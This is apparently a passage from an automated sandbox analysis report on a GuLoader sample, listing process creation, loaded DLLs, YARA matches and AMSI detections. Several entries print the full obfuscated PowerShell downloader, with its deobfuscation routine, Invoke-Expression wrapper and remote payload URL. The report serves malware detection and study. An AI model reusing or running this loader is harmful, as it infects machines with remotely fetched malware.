frugClep2RentcOr,h.KlapiAtelc Ancu Tra/KludZDopitComby groSBiorv.ctuRBystyL ngzSeis/ RevBMblelTrvluHemisGrimt AppeoverrRinkeRhinrDiff.Dor dSpadeSkarpsodfl Como enzy';$Tryksager=Astroite ' elm>';$criminologist=Astroite 'Hulli BonEBat.x';$Lnindkomsts='Noncontingency';$breadbox='\misinforms.Non';Forvanskende (Astroite ' Skr$Rm bgSv nLparaoTappBMa uAU melBema:FaktcShrii hosFllesbehaEOpunlPuin= Und$Uns.ESandnIntoVDien:Jac AUn epCullpKammdAnglAElektPs uA Sub+Fo n$ EskBSubsrBarneThora PlaDDepeB D mOSni X');Forvanskende (Astroite ' an$Sprog.krsLSti OKlieBRefaAB.ggL A.k:Subcg RumRChowA RekMU deMChicONeooFAfveoParan MokEMicrRS agSPely=Baz $F,beAOutwAJab,NNaphDTrres EagA cykRObseICop,SHkketEntiOPennk TypRKlynaEdapt inge.jern dsmSOutw. Va,SsubdPVerdLUnsiINa sT Fry( Ski$spectS lvR ssiy.rank Bars Teka hangKemie raR Cal)');Forvanskende (Astroite $Grillhandske);$Aandsaristokratens=$Grammofoners[0];$Couloir4=(Astroite ',obb$SurnGPublL BikoSupebBazeAFantl lin: rinDStibi,ornf A hfhalmECongRHeadE UdrNUdebTCohaiundeaUnth= ,erNCedae DoyWSkil- DiboB,dgbF rrjM skE eluc afht Udr WatSunmoYDhfpSTribTEctoeCaroMhyst. Ven$SvarRS weeskylD ouseUnexfOpunIDissN dviE B kr rane,arsNKa tdu dee');Forvanskende ($Couloir4);Forvanskende (Astroite ' Moo$ yloD Bu,i.obbfAandfSonneTartr .ydeSkafnL,svt SyriUnivaFio . enHSexte.neoaSchfdUdgieEjerrGemisSemi[ti m$ AgrR rkba Forc Klukkerme ,nttO,idl Unsi.riuk I le S.hn vald
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$handsaws='Underhive';;$Hjlpevinduernes='genernrr';;$Skovspurvenes='Folkekre';;$Fremsende='Peddigrrets';;$kbelysten=$host.Name; function Astroite($Moedt){If ($kbelysten) {$Potheen='Madelines214';$Spildendes=4;$Racketlike=$Spildendes}do{$Harpers+=$Moedt[$Racketlike];$Racketlike+=5} until(!$Moedt[$Racketlike])$Harpers}function Forvanskende($Piphas119){ .($criminologist) ($Piphas119)}$Redefinerende=Astroite 'vascnVer,e roeT Oto.UhyrW';$Redefinerende+=Astroite 'charEmel,B Si,CAnetL skiIbreceFeltNK.ont';$Adkomsthaveren=Astroite 'ChepMUnwooK lizRangiLattlst nl Cena Pom/';$knippelgodes=Astroite ' nkT Es lLei s Vit1Plat2';$Grillhandske='Corv[ StanAnlgE inatHjti.OpkasForseF rsR,ineVRudlICo tCBareESlu P SkyoPhotiTendNRealtBr dM UndAUdvanFo fABombG Br e Gr RFol ]Mu,f:Upwe: Il,SGoodeUkolc emuF emRSt mIErraTInteySup.pBen.RPatiO GentUndrOAn yCKlonODia lTi.s= up$s rakM.ndn Acti D.sPKolopRa ie PrsL oweGFlasOByggd V.lEIndfS';$Adkomsthaveren+=Astroite 'Un,a5Hum .Fis.0Bill ,and(Ov rWBoobiKernn MosdB rtoSlotw BoosHand BypNRe,gTpent Re y1Fork0Fa n.Ausp0over; F.n MussW Efti Carn.dea6Neur4Ophi; Syl Wi.dxBhin6Pinm4Cama;Mo,b Drosr F rvQuad:sket1Tot 3Hous1Indg. La 0Urop) Ger GennGonyceT.gtc prokUne o Ind/skal2Josi0Pins1 Ord0Fu o0 Frm1Ov r0P op1Aeg. CyklF,fpaiCombrTeate UndfStyloDef x Spa/ g s1Orch3 mo,1 Men.dato0';$Racketlikenddateringsfase=Astroite ' .utUUnmuSConse F eR Fo - Raca S rGSta.eMor,n verT';$Aandsaristokratens=Astroite 'DoblhUndetSa dtStrapAntesS mm:Skru/opsl/ Timi frugClep2RentcOr,h.KlapiAtelc Ancu Tra/KludZDopitComby groSBiorv.ctuRBystyL ngzSeis/ RevBMblelTrvluHemisGrimt AppeoverrRinkeRhinrDiff.Dor dSpadeSkarpsodfl Como enzy';$Tryksager=Astroite ' elm>';$criminologist=Astroite 'Hulli BonEBat.x';$Lnindkomsts='Noncontingency';$breadbox='\misinforms.Non';Forvanskende (Astroite ' Skr$Rm bgSv nLparaoTappBMa uAU melBema:FaktcShrii hosFllesbehaEOpunlPuin= Und$Uns.ESandnIntoVDien:Jac AUn epCullpKammdAnglAElektPs uA Sub+Fo n$ EskBSubsrBarneThora PlaDDepeB D mOSni X');Forvanskende (Astroite ' an$Sprog.krsLSti OKlieBRefaAB.ggL A.k:Subcg RumRChowA RekMU deMChicONeooFAfveoParan MokEMicrRS agSPely=Baz $F,beAOutwAJab,NNaphDTrres EagA cykRObseICop,SHkketEntiOPennk TypRKlynaEdapt inge.jern dsmSOutw. Va,SsubdPVerdLUnsiINa sT Fry( Ski$spectS lvR ssiy.rank Bars Teka hangKemie raR Cal)');Forvanskende (Astroite $Grillhandske);$Aandsaristokratens=$Grammofoners[0];$Couloir4=(Astroite ',obb$SurnGPublL BikoSupebBazeAFantl lin: rinDStibi,ornf A hfhalmECongRHeadE UdrNUdebTCohaiundeaUnth= ,erNCedae DoyWSkil- DiboB,dgbF rrjM skE eluc afht Udr WatSunmoYDhfpSTribTEctoeCaroMhyst. Ven$SvarRS weeskylD ouseUnexfOpunIDissN dviE B kr rane,arsNKa tdu dee');Forvanskende ($Couloir4);Forvanskende (Astroite ' Moo$ yloD Bu,i.obbfAandfSonneTartr .ydeSkafnL,svt SyriUnivaFio . enHSexte.neoaSchfdUdgieEjerrGemisSemi[ti m$ AgrR rkba Forc Klukkerme ,nttO,idl Unsi.riuk I le S.hn valdJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: agement.Automation.pdb source: powershell.exe, 00000005.00000002.1741303006.0000000007339000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1741303006.0000000007378000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.1341689491.00000223AF8E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1344430785.00000223AFAE1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: stem.Core.pdb source: powershell.exe, 00000005.00000002.1741303006.0000000007407000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              VBScript performs obfuscated calls to suspicious functions
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute("powershell", "";$handsaws='Underhive';;$Hjlpevinduern", "", "", "0");
              Yara detected GuLoader
              Source: Yara matchFile source: 00000005.00000002.1748291655.000000000994F000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1748100726.0000000008700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1728698519.0000000005995000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.1538011083.00000248688D2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($ideposer)$GlobAl:AdENoiDIsM = [SySTeM.tEXT.enCoDInG]::aSCii.GETsTRING($GLasPUStERNE)$gLoBaL:iNTerImsBeViSErS=$adEnoIDisM.subsTriNG($DRSlagEnES,$nATuralISErINgER)<#Semipreserved Timon
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Technical235 $Vesuvite $Udredningsarbejde), (Quaintish @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Pedestrian = [AppDomain]::CurrentDomain.GetAssemblie
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Elendil)), $Gnomezombie).DefineDynamicModule($Folioarkenes209, $false).DefineType($Battutas, $Fruitlets, [System.MulticastDelegate])$L
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($ideposer)$GlobAl:AdENoiDIsM = [SySTeM.tEXT.enCoDInG]::aSCii.GETsTRING($GLasPUStERNE)$gLoBaL:iNTerImsBeViSErS=$adEnoIDisM.subsTriNG($DRSlagEnES,$nATuralISErINgER)<#Semipreserved Timon
              Suspicious powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$handsaws='Underhive';;$Hjlpevinduernes='genernrr';;$Skovspurvenes='Folkekre';;$Fremsende='Peddigrrets';;$kbelysten=$host.Name; function Astroite($Moedt){If ($kbelysten) {$Potheen='Madelines214';$Spildendes=4;$Racketlike=$Spildendes}do{$Harpers+=$Moedt[$Racketlike];$Racketlike+=5} until(!$Moedt[$Racketlike])$Harpers}function Forvanskende($Piphas119){ .($criminologist) ($Piphas119)}$Redefinerende=Astroite 'vascnVer,e roeT Oto.UhyrW';$Redefinerende+=Astroite 'charEmel,B Si,CAnetL skiIbreceFeltNK.ont';$Adkomsthaveren=Astroite 'ChepMUnwooK lizRangiLattlst nl Cena Pom/';$knippelgodes=Astroite ' nkT Es lLei s Vit1Plat2';$Grillhandske='Corv[ StanAnlgE inatHjti.OpkasForseF rsR,ineVRudlICo tCBareESlu P SkyoPhotiTendNRealtBr dM UndAUdvanFo fABombG Br e Gr RFol ]Mu,f:Upwe: Il,SGoodeUkolc emuF emRSt mIErraTInteySup.pBen.RPatiO GentUndrOAn yCKlonODia lTi.s= up$s rakM.ndn Acti D.sPKolopRa ie PrsL oweGFlasOByggd V.lEIndfS';$Adkomsthaveren+=Astroite 'Un,a5Hum .Fis.0Bill ,and(Ov rWBoobiKernn MosdB rtoSlotw BoosHand BypNRe,gTpent Re y1Fork0Fa n.Ausp0over; F.n MussW Efti Carn.dea6Neur4Ophi; Syl Wi.dxBhin6Pinm4Cama;Mo,b Drosr F rvQuad:sket1Tot 3Hous1Indg. La 0Urop) Ger GennGonyceT.gtc prokUne o Ind/skal2Josi0Pins1 Ord0Fu o0 Frm1Ov r0P op1Aeg. CyklF,fpaiCombrTeate UndfStyloDef x Spa/ g s1Orch3 mo,1 Men.dato0';$Racketlikenddateringsfase=Astroite ' .utUUnmuSConse F eR Fo - Raca S rGSta.eMor,n verT';$Aandsaristokratens=Astroite 'DoblhUndetSa dtStrapAntesS mm:Skru/opsl/ Timi frugClep2RentcOr,h.KlapiAtelc Ancu Tra/KludZDopitComby groSBiorv.ctuRBystyL ngzSeis/ RevBMblelTrvluHemisGrimt AppeoverrRinkeRhinrDiff.Dor dSpadeSkarpsodfl Como enzy';$Tryksager=Astroite ' elm>';$criminologist=Astroite 'Hulli BonEBat.x';$Lnindkomsts='Noncontingency';$breadbox='\misinforms.Non';Forvanskende (Astroite ' Skr$Rm bgSv nLparaoTappBMa uAU melBema:FaktcShrii hosFllesbehaEOpunlPuin= Und$Uns.ESandnIntoVDien:Jac AUn epCullpKammdAnglAElektPs uA Sub+Fo n$ EskBSubsrBarneThora PlaDDepeB D mOSni X');Forvanskende (Astroite ' an$Sprog.krsLSti OKlieBRefaAB.ggL A.k:Subcg RumRChowA RekMU deMChicONeooFAfveoParan MokEMicrRS agSPely=Baz $F,beAOutwAJab,NNaphDTrres EagA cykRObseICop,SHkketEntiOPennk TypRKlynaEdapt inge.jern dsmSOutw. Va,SsubdPVerdLUnsiINa sT Fry( Ski$spectS lvR ssiy.rank Bars Teka hangKemie raR Cal)');Forvanskende (Astroite $Grillhandske);$Aandsaristokratens=$Grammofoners[0];$Couloir4=(Astroite ',obb$SurnGPublL BikoSupebBazeAFantl lin: rinDStibi,ornf A hfhalmECongRHeadE UdrNUdebTCohaiundeaUnth= ,erNCedae DoyWSkil- DiboB,dgbF rrjM skE eluc afht Udr WatSunmoYDhfpSTribTEctoeCaroMhyst. Ven$SvarRS weeskylD ouseUnexfOpunIDissN dviE B kr rane,arsNKa tdu dee');Forvanskende ($Couloir4);Forvanskende (Astroite ' Moo$ yloD Bu,i.obbfAandfSonneTartr .ydeSkafnL,svt SyriUnivaFio . enHSexte.neoaSchfdUdgieEjerrGemisSemi[ti m$ AgrR rkba Forc Klukkerme ,nttO,idl Unsi.riuk I le S.hn vald
